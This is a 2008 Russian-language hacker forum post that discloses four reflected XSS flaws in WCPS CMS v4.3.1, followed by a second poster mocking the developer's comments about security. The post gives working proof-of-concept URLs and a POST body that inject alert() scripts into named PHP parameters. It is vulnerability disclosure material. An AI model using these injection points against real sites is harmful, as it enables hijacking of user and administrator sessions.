17.02.2008, 22:04
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Множественные XSS в cms WCPS v4.3.1
4 пассивные XSS по мере убывания их юзабельности:
Код:
http://test2.ru/php/print.php?id=1&email_autor=1%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E1&nma=news
Код:
http://test2.ru/php/exp_to_save.php
POST: asfile=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
PS: XSS срабатывает только на админах
Код:
http://test2.ua/php/dload.php?ids=%3Cscript%3Ealert()%3C/script%3E
PS: только для сайтов в имени которых есть строка "ua"
Код:
http://test2.ru/php/gzstat.php?id=1&nma=news&categoria=<script>alert('xss')</script>
PS: xss образуется в загружаемом файле
================================================== ==========================
Примичание Grey`я:
Почитал новости и форум на офф сайте этой cms, ну очень весело... Пару комментов для автора этого чуда:
Код:
продвинутому хакеру отсутствие версии это только чуть чуть задержит опредиление что делать, обычно последняя еще не взломана.
Нет это как раз не обычно.
Код:
Вот уязвимости надо убирать.
Код:
Рано или поздно мы вычистим все баги
Ога убери их на х@@ =))
Мне всегда казалось что их надо исправлять, а еще лучше кодить так что бы в одном скрипте не было по несколько бажных кусков, только для этого нужен мозг...
Код:
Вышел новый апдейт с 4.3 до 4.3.1
Апдейт обязателен, т.к. связан с безопасностью
ИЗМЕНЕНИЯ:
1) Устранена ошибка 404
Убило. Что больше нет ошибки 404? Типа существуют все страницы? Очень привликательное изменение.
__________________
Кто я?..
Последний раз редактировалось Grey; 17.02.2008 в 22:15..
|
|
|